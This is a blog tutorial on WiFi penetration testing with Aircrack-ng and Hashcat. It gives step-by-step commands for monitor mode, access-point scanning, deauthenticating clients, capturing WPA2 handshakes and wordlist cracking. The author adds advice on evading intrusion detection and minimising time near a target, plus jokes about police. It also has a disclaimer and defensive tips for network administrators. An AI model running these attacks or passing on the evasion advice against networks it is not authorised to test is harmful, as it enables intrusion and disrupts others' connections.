xavier collantes

WiFi Penetration Testing with Aircrack-ng

By Xavier Collantes

10/22/2025

Disclaimer

This article is for educational purposes only. WiFi penetration testing should only be performed on networks you own or have explicit written authorization to test.

If you found this useful, consider giving my article a LIKE before the police take you away.

In this article, we will explore the process of WiFi penetration testing mainly using the Aircrack-ng and Hashcat suite of tools to capture a 4-way handshake and infiltrate a WiFi network. In real-life you would need to gain access to the network first to implement further exploits such as WiFi phishing, fake access points, and more.

Process:

Capture the 4-way handshake using Airmon-ng and Airodump-ng
Crack the password offline using Aircrack-ng and Hashcat
Infiltrate the network with found WiFi password

I may use the following terms interchangeably:

AP = Access Point = Network = (the WiFi router in non-technical terms)
BSSID = Basic Service Set Identifier = MAC address of the Access Point
SSID = Service Set Identifier = Network name

Understanding WiFi Security Protocols

WPS: The Obsolete Protocol (~2006-2015)

WiFi Protected Setup (WPS) was designed for convenience but introduced critical vulnerabilities. An 8-digit PIN is used for quick access between devices on the same network. The 8-digit PIN can be easily brute-forced, making it obsolete for secure networks.

Tools: Aircrack-ng, Reaver

Countermeasure: Disable WPS on all access points.

While WPS is rarely used today, always scan for it during reconnaissance. Legacy networks may still have it enabled.

WPA2: The Current Standard (~2007-present)

WPA2 remains the most common protocol in most WiFi networks today.

The attack vector we will discuss is on capturing the 4-way handshake during authentication for WPA2.

WPA3: The Future

WPA3 offers improved security but can be vulnerable to downgrade attacks, forcing networks back to WPA2.

Where WPA3 is better than WPA2:

Each device connected to the network has a unique key; WPA2 uses the same key for all devices
Advanced encryption standard AES in Galois/Counter Mode (GCM) as opposed to AES-CCMP

Hardware Requirements

Most built-in WiFi adapters cannot perform packet injection or enter monitor mode. External adapters are required.

Regular WiFi cards typically operate in Managed Mode, capturing only packets destined for your MAC address. Penetration testing requires Monitor Mode, which captures all wireless traffic.

Examples:

Ralink RT5370 WiFi USB Adapter

Alfa AWUS036ACHM 802.11ac WiFi USB Adapter

Adapter Driver Installation

The driver installation may be different for your adapter. Please refer to the adapter's documentation for the correct installation steps.

Download driver.

Bash

1git clone https://github.com/lwfinger/rtw88
2cd rtw88
3make
4sudo make install
5
6# Disable Secure Boot if driver does not load on reboot
7# Verify installation
8ip a  # Should show: localhost, existing WiFi, and ALFA adapter
9

Download driver. hosted withby Xavier

The Aircrack-ng Suite

Aircrack-ng provides a complete toolkit for WiFi security testing:

Pulling network info
Listening for packets (passive)
Wireless attacks such as force device deauthentication, replay, fake APs (active)
Password cracking for WEP, WPA/WPA2/WPA3

Installation

Bash

1sudo apt update
2sudo apt install aircrack-ng
3sudo aircrack-ng -u
4

snippet hosted withby Xavier

Reconnaissance Phase

Step 1: Identify Your Network Interface

Find your network interfaces.

Bash

1ip a
2
3# For convenience, export your adapter.
4export NETWORK_INTERFACE=wlan1
5

Find your network interfaces. hosted withby Xavier

Replace NIC with your adapter name. Could be any name but is usually something else from localhost and existing WiFi adapter.

Step 2: Enable Monitor Mode

Put card into MONITOR mode.

Bash

1sudo airmon-ng start $NETWORK_INTERFACE
2

Put card into MONITOR mode. hosted withby Xavier

sudo airmon-ng check kill will shutdown existing WiFi connections. To restart them, run:

Google ahead of time commands for your OS but this is for Debian.

Bash

1sudo systemctl restart wpa_supplicant
2sudo systemctl restart NetworkManager
3

Google ahead of time commands for your OS but this is for Debian. hosted withby Xavier

Kill conflicting processes (this will disconnect your WiFi connection).

Bash

1sudo airmon-ng check kill
2

Kill conflicting processes (this will disconnect your WiFi connection). hosted withby Xavier

Enabling monitor mode will disconnect your primary WiFi connection. Consider using a separate device for internet access during testing.

Step 3: Scan for Access Points

Goal: Get a list of APs in the area. And focus on a specific AP and identify the BSSID and CHANNEL.

Begin scanning all channels.

Bash

1sudo airodump-ng -w output/scan $NETWORK_INTERFACE
2

Begin scanning all channels. hosted withby Xavier

This command channel-hops between channels 1-14 (802.11b/g) to discover access points.

Key Fields:

BSSID: MAC address of the access point unique to the AP.
PWR: Signal strength.
Beacons: Number of beacon frames (indicates signal quality)
ENC: Encryption type (OPN, WEP, WPA, WPA2)
ESSID: Network name

Parse the CSV output for specific targets.

Bash

1head output/scan-01.csv
2cat output/scan-01.csv | grep "NAME OF NETWORK"
3

Parse the CSV output for specific targets. hosted withby Xavier

Step 4: Lock Onto Target AP

Channel hopping with airodump-ng is only useful for finding APs. To focus on a specific AP, you need to use the --bssid flag.

Learning Resource

From experience, you should keep your digital footprint minimal. Don't leave a trail of data behind you. Passive listening is low risk but your risk increases dramatically if you are actively sending packets. Focus on specific targets to keep your digital footprint minimal and save your time.

Once you have identified your target, focus on it specifically:

Focus on single access point.

Bash

1sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w output/target $NETWORK_INTERFACE
2
3# Example:
4sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w output/target $NETWORK_INTERFACE
5

Focus on single access point. hosted withby Xavier

Capturing the Handshake

This is the hardest and trickiest part in the field because being close enough to the AP to capture the handshake is difficult. You will need to wait until a client device deauths then reauths to the AP.

Deauthentication attacks are detectable. Many networks employ Intrusion Detection Systems (IDS) that monitor for excessive deauth packets. Use with caution and only when necessary.

There are ways to capture the handshake without forcing deauthentication.

Understanding Deauthentication

Deauth packets are the formal way devices disconnect from access points. However, they are not always sent:

Actions that send deauth:

Enabling airplane mode
Closing a laptop and laptop enters sleep mode
Shutting down a device

Actions that do not:

Walking out of range
Sudden power loss

The Stealthy Approach

If you show up to a coffee shop trying to hack their WiFi network dressed like this, you will go to jail.

Best practice: Don't force deauthentication at all. Wait for natural reauthentication events:

People arriving and opening laptops
Devices reconnecting after being away
Natural network activity in busy locations

This maintains stealth and leaves minimal trace.

Forced Deauthentication (When Necessary)

Forced deauthentication is detectable. Many networks employ Intrusion Detection Systems (IDS) that monitor for excessive deauth packets. Please give my blog a LIKE before the police come to your door.

Bash

1# Target specific client device
2# Find connected clients in the bottom section of airodump-ng output
3
4sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> $NETWORK_INTERFACE
5
6# Example:
7sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 $NETWORK_INTERFACE
8

snippet hosted withby Xavier

Confirming Handshake Capture

When successful, you will see:

Bash

1CH  6 ][ Elapsed: 8 mins ][ 2025-10-22 14:30 ][ WPA handshake: AA:BB:CC:DD:EE:FF
2

snippet hosted withby Xavier

Verify the capture:

Bash

1# Must show "1 handshake"
2sudo aircrack-ng output/target-01.cap
3

snippet hosted withby Xavier

Offline Password Cracking

Once you have the handshake, you can leave the physical location. Cracking is computationally intensive and best done elsewhere.

Minimize time near the target. Prolonged presence increases detection risk. Gather your capture files and move to a secure location.

Speed Comparison

Aircrack-ng (CPU): 500-5,000 keys/sec
Hashcat (CPU): 5,000-50,000 keys/sec
Hashcat (Single GPU): 100,000-500,000 keys/sec
Hashcat (Multiple GPUs): 1,000,000+ keys/sec

Using Aircrack-ng CPU only

Crack with wordlist.

Bash

1sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> <CAPTURE_FILE>
2
3# Example:
4sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF output/target-01.cap
5

Crack with wordlist. hosted withby Xavier

Using Hashcat with GPU

For significantly faster cracking with GPU acceleration:

Bash

1# Install conversion tools
2sudo apt install hcxtools -y
3
4# Convert CAP to HC22000 format
5hcxpcapngtool -o capture.hc22000 target-01.cap
6
7# Crack with Hashcat
8hashcat -m 22000 -w 2 -O capture.hc22000 /usr/share/wordlists/rockyou.txt
9

snippet hosted withby Xavier

Hashcat Parameters:

-m 22000: Mode for WPA/WPA2
-w 2: Workload profile (1=Low, 2=Default, 3=High, 4=Insane)
-O: Optimized kernel (requires more memory but faster)

Wordlist Resources

Bash

1# Comprehensive WPA2 wordlists
2git clone https://github.com/kennyn510/wpa2-wordlists
3cd wpa2-wordlists
4gunzip *gz
5cat *txt >> combined.txt
6

snippet hosted withby Xavier

Defensive Recommendations

If you're a network administrator:

Disable WPS entirely
Use WPA3 where possible
Enforce strong password policies (16+ characters)
Monitor for deauthentication attacks
Regularly audit network access

xavier collantes

WiFi Penetration Testing with Aircrack-ng

Disclaimer

Understanding WiFi Security Protocols

WPS: The Obsolete Protocol (~2006-2015)

WPA2: The Current Standard (~2007-present)

WPA3: The Future

Hardware Requirements

Adapter Driver Installation

The Aircrack-ng Suite

Installation

Reconnaissance Phase

Step 1: Identify Your Network Interface

Step 2: Enable Monitor Mode

Step 3: Scan for Access Points

Step 4: Lock Onto Target AP

Capturing the Handshake

Understanding Deauthentication

The Stealthy Approach

Forced Deauthentication (When Necessary)

Confirming Handshake Capture

Offline Password Cracking

Speed Comparison

Using Aircrack-ng CPU only

Using Hashcat with GPU

Wordlist Resources

Defensive Recommendations

Further Reading

Related Articles

Meshtastic: Building LoRA Mesh Networks for Communication

Network Debugging: Ports to Packet Traces

Space & Cowboys: How Star Trek and Rawhide Share the Same DNA

Related Articles

Meshtastic: Building LoRA Mesh Networks for Communication
Exploring off-grid radio software and hardware outside of internet or cellular coverage.
By Xavier Collantes9/27/2025
thingsIBuilt
radio
lora
+11
By Xavier Collantes9/27/2025

Network Debugging: Ports to Packet Traces
My scripts and tools for diagnosing connectivity issues.
By Xavier Collantes9/24/2025
networking
debugging
architecture
+9
By Xavier Collantes9/24/2025

Space & Cowboys: How Star Trek and Rawhide Share the Same DNA
An analysis of the parallels between Star Trek and the western Rawhide, how the final frontier mirrors the American frontier.
By Xavier Collantes9/1/2025
interests
analysis
television
+5
By Xavier Collantes9/1/2025